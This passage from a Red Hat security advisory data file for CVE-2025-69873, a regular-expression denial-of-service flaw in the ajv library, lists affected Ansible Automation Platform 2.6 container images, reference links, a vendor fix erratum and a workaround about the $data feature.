"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
